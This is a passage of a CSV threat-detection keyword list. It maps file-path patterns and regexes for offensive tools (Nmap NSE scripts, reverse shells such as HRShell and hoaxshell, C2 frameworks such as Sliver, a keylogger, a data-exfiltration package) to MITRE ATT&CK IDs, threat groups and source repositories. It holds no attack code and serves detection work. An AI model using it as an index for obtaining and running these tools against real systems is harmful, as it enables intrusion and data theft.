- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","7812"
"*/hostmap-bfk.nse*",".{0,1000}\/hostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7813"
"*/hostmap-crtsh.nse*",".{0,1000}\/hostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7814"
"*/hostmap-robtex.nse*",".{0,1000}\/hostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7815"
"*/HostRecon.ps1*",".{0,1000}\/HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7816"
"*/Hotkeyz.exe*",".{0,1000}\/Hotkeyz\.exe.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","7817"
"*/hotkeyz.git*",".{0,1000}\/hotkeyz\.git.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","7818"
"*/HouQing/*/Loader.go",".{0,1000}\/HouQing\/.{0,1000}\/Loader\.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","7819"
"*/HRShell.git*",".{0,1000}\/HRShell\.git.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","7820"
"*/HRShell/*",".{0,1000}\/HRShell\/.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","7821"
"*/hta_attack/*",".{0,1000}\/hta_attack\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7822"
"*/hta_gen.py*",".{0,1000}\/hta_gen\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","7823"
"*/HTMLSmuggler.git*",".{0,1000}\/HTMLSmuggler\.git.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","7824"
"*/HTMLSmuggler/*",".{0,1000}\/HTMLSmuggler\/.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","7825"
"*/htran.exe*",".{0,1000}\/htran\.exe.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7826"
"*/HTran.git*",".{0,1000}\/HTran\.git.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7827"
"*/Htran-master.zip*",".{0,1000}\/Htran\-master\.zip.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","1","N/A","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","7828"
"*/htshells.git*",".{0,1000}\/htshells\.git.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","7829"
"*/http_exfiltration.py*",".{0,1000}\/http_exfiltration\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","7830"
"*/http_payload.ps1*",".{0,1000}\/http_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","7831"
"*/http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\/http\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7832"
"*/http-affiliate-id.nse*",".{0,1000}\/http\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7833"
"*/http-apache-negotiation.nse*",".{0,1000}\/http\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7834"
"*/http-apache-server-status.nse*",".{0,1000}\/http\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7835"
"*/http-aspnet-debug.nse*",".{0,1000}\/http\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7836"
"*/httpattack.py*",".{0,1000}\/httpattack\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","7837"
"*/http-auth.nse*",".{0,1000}\/http\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7838"
"*/http-auth-finder.nse*",".{0,1000}\/http\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7839"
"*/http-avaya-ipoffice-users.nse*",".{0,1000}\/http\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7840"
"*/http-awstatstotals-exec.nse*",".{0,1000}\/http\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7841"
"*/http-axis2-dir-traversal.nse*",".{0,1000}\/http\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7842"
"*/http-backup-finder.nse*",".{0,1000}\/http\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7843"
"*/http-barracuda-dir-traversal.nse*",".{0,1000}\/http\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7844"
"*/http-bigip-cookie.nse*",".{0,1000}\/http\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7845"
"*/http-brute.nse*",".{0,1000}\/http\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7846"
"*/http-c2.go*",".{0,1000}\/http\-c2\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","7847"
"*/http-cakephp-version.nse*",".{0,1000}\/http\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7848"
"*/http-chrono.nse*",".{0,1000}\/http\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7849"
"*/http-cisco-anyconnect.nse*",".{0,1000}\/http\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7850"
"*/HTTP-Client.sh*",".{0,1000}\/HTTP\-Client\.sh.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#linux","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","7851"
"*/http-coldfusion-subzero.nse*",".{0,1000}\/http\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7852"
"*/http-comments-displayer.nse*",".{0,1000}\/http\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7853"
"*/http-config-backup.nse*",".{0,1000}\/http\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7854"
"*/http-cookie-flags.nse*",".{0,1000}\/http\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7855"
"*/http-cors.nse*",".{0,1000}\/http\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7856"
"*/http-cross-domain-policy.nse*",".{0,1000}\/http\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7857"
"*/http-csrf.nse*",".{0,1000}\/http\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7858"
"*/http-date.nse*",".{0,1000}\/http\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7859"
"*/http-default-accounts.nse*",".{0,1000}\/http\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7860"
"*/http-devframework.nse*",".{0,1000}\/http\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7861"
